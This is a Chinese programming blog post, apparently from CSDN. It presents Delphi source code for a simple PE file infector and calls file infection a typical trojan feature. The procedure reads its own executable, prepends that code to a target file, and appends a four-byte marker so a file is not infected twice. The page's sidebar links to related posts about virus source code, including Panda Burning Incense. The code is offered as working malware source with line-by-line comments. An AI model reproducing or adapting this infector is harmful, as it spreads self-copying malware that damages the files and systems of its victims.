delphi 简单PE文件感染源码!

最新推荐文章于 2021-01-07 19:05:56 发布
最新推荐文章于 2021-01-07 19:05:56 发布
阅读量702 收藏 1
点赞数
分类专栏: Delphi TStream 编程 文章标签: delphi file string

文件感染是木马故有的特征,其实实现这样的功能并不难!下面是一个简单实例的源码:

procedure copy(s:string);///S:目标文件完整文件名(带路径的)
var
s1,s2,s3:tmemorystream; //内存流
file1:tfilestream;//文件流
id:integer;
iid:longint;
const
id=$66666666;//感染标识
begin
file1:=tfilestream.Create(s,fmopenread);//将目标文件读入文件流
if file1.Size>1024000 then //如果目标文件大于10M则退出
    begin
    file1.Free;
    close;
    end
    else
    begin
    file1.Free;//比较完毕释放文件流
s1:=tmemorystream.Create;//创建内存流
s1.LoadFromFile(paramstr(0));//将病毒自身读入临时内存流
s2:=tmemorystream.Create;
s2.CopyFrom(s1,s1.Size);//将病毒流写入主内存流
s1.Clear;
s3:=tmemorystream.creat;
s3.LoadFromFile(s);//装入目标文件
s3.seek(-4,sofromend);//定位到文件的最后4个字节
s3.read(iid,4);//读取最后4个字节
if iid=id then //判断是否感染
begin
s3.free;//如果感染过了就退出
close;
end
else
begin
s1.loadfromfile(s);//将目标文件装入临时流
s2.Seek(s2.Size,sofrombeginning);//定位到主内存流的尾部
s2.CopyFrom(s1,s1.Size);//写入目标文件到主内存流
s1.Free;
s2.seek(0,sofromend);//定位到尾部
iid:=$66666666;
s2.write(iid,4);//写入感染标识
s2.SaveToFile(s);//将主内存流写入目标文件完成感染
s2.Free;
      end;
    end;
end;

god00
关注
专栏目录
PE文件节区添加并弹出简单的对话框
12-03
PE文件自动添加节区,并弹出一个简单的对话框(可以自己修改成其它的东西)
delphi版本修改PE源码
weixin_33705053的博客
01-08 217
//VC++6外衣 1 OEPCODEFIVE: THEAD = ($55, $8B, $EC, $6A, $FF, $68, $00, $00, $00, $00, $68, $00, $00, $00, $00, $64, $A1, $00, $00, $00, $00, $50, $64, $89, $25, $00, $00, $00, $00, $83, $EC, $68, ...
delphi读写PE文件
04-18
delphi读取PE文件很好的学习例子,在PE文件结尾追加数据。
delphiPE文件结构
03-11 359
PE文件: ----------------------------------------------------------------------- | DOS Header | 其中_lfanew 域指向4...
[严重警惕]感染delphi编译器的SysConst.dcu病毒
weixin_30917213的博客
08-24 283
大家检查下delphi安装目录lib下的SysConst.dcu文件,大小如果为17KB左右,则是被感染了。SysConst.dcu正式大小应该为12KB不到。如不解决,将导致Delphi编译出的所有程序都带有病毒...目前我发现的是D6 D7都被感染,而且潜伏期超过3-5个月..也就是说我这3-5个月中编译的程序都带有这个病毒...T_T无意间成了病毒传播的帮凶了.其他版本的Delphi也请自检...
感染PE文件源码
哈哈Delphi学习空间
04-25 660
program XX;{$APPTYPE CONSOLE}usesSysUtils,Windows,ShellApi,TlHelp32;//-----------------------DETERMINE PROCESS EXISTANCE-----------------------------function process_exists(exeFileName: string): Boole
windows下PE文件感染
01-18 407
。 转载于:https://www.cnblogs.com/beyond-Acm/p/4232123.html
Win32:Katusha-BC病毒专杀工具Delphi源码
02-08
去年元旦电脑裸奔终于...反正中毒也不是一件坏事,虽然丢失一些文件和损失了一些时间,但是我熟悉了PE格式,今天想也不敝帚自珍了,将源代码(Bulid on Delphi 7)和执行文件一并分享出来,希望给用得上的人一些帮助。
熊猫烧源码 熊猫烧源码.txt
01-18
根据提供的文件信息,可以看出这是一段程序代码,主要涉及到Delphi编程语言的使用,并且从描述及部分代码来看,这段程序可能与一个被称为“熊猫烧香”(Panda Burning Incense)的恶意软件有关。接下来将对代码中的...
熊猫源码(不是很全,大体框架是有的)小时候一直想做的一个东西哈哈哈
Coisini的博客
05-25 2899
program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版...
Delphi PE文件格式研究及PEDUMP的实现(专业论文+源码
07-08
Delphi PE文件格式研究及PEDUMP的实现,专业论文+源码。 Windows PE文件格式分析与PEDUMP的实现-Windows PE File Format Analysis and realization of PEDUMP
PEDump Delphi版的PE文件结构分析工具
06-26
PEDump Delphi版的PE文件结构分析工具! 值得下载看看!资源免费,大家分享!! 更多免费资源 http://ynsky.download.csdn.net/
pe文件信息查看程序源码vc delphi
01-05
pe文件信息查看程序源码 vc及delphi,可以查看文件信息、可选头部、文件头、节表信息、目录信息、输出表、输入表、资源表(可以显示图标、位图、字符串等)、调试表、TLS表、文件地址计算器等,对于学习PE格式的朋友很有帮助。
易语言写EXE应用程序感染源代码
04-23
易语言替换文件图标 感染应用程序 寻找驱动器所有应用程序 dll调用 易语言捆绑源码
PE文件简单加密(加壳)--源码 <img src="/images/sunny.gif" ali
02-23
这个小软件通过在可执行文件(.exe)的尾部添加一个新节(Section),并且修改PE的入口地址,使可执行文件在运行时,跳出一个输入密码的对话框,从而实现了简单的加密。源程序采用Delphi 6.0编写, 兼有少量的asm代码,用於可执行文件的加密。如需传播,请保留作品的完整性!
熊猫烧香 - 核心源码 (僅供研究使用!後果自行負責 )
hunhun02的专栏
03-01 1371
熊猫烧香 - 核心源码 -------------------------------------------------
[系统安全] 十三.熊猫烧香病毒IDA和OD逆向分析(中)病毒释放机理
杨秀璋的专栏
01-07 5353
如果你想成为一名逆向分析或恶意代码检测工程师,或者对系统安全非常感兴趣,就必须要认真分析一些恶意样本。熊猫烧香病毒就是一款非常具有代表性的病毒,当年造成了非常大的影响,并且也有一定技术手段。本文将详细讲解熊猫烧香的行为机理,并通过软件对其功能行为进行分析,这将有助于我们学习逆向分析和反病毒工作。后续作者还将对其进行逆向调试,以及WannaCry勒索蠕虫、各种恶意样本及木马的分析。基础性文章,希望您喜欢! IDA和OD作为逆向分析的“倚天剑和“屠龙刀”,学好它们的基本用法至关重要。本文重点分析熊猫烧香病毒的功
PE文件感染和内存驻留
杨航的专栏
03-12 1723
这次,作者将和大家一起讨论病毒的感染技术。另外,从本文开始,我们将陆续接触到一些病毒的高级编码技术。例如,内存驻留、EPO(入口点模糊)技术、加密技术、多态和变形等。通过这些高级技巧,你将进一步感受到病毒技术的精华,从而更好的享受其中精妙的思想与编程技艺。   在解决了起始目录的问题之后,就可以从这些起始目录开始使用FindFirstFile和FindNextFile开始遍历其下以及其子目录下的
PE文件感染
weixin_33738982的博客
10-02 319
2019独角兽企业重金招聘Python工程师标准>>> ...
Delphi实现文件上传与下载:源码实例
Delphi编程中,上传和下载文件是一项常见的任务,特别是在处理Web服务交互时。本文档详细介绍了如何在Delphi环境中实现文件上传和下载功能,使用的是Embarcadero的 Indy(Internet Data Components)库,特别是`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值